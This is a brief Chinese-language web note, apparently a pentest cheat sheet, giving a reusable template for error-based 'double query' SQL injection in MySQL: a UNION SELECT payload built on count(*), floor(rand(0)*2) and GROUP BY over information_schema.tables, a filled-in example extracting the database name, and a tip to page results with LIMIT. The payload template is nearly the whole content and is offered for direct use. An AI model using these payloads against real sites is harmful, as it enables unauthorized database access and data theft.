雙查詢注入固定公式

union select 1 from (select count(*),concat(floor(rand(0)*2),(
注入語句
))a from information_schema.tables group by a)b -- -


如:

union select 1 from (select count(*),concat(floor(rand(0)*2),(
select database()
))a from information_schema.tables group by a)b -- -


查詢過多顯示不了時,可使用limit m,1


發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章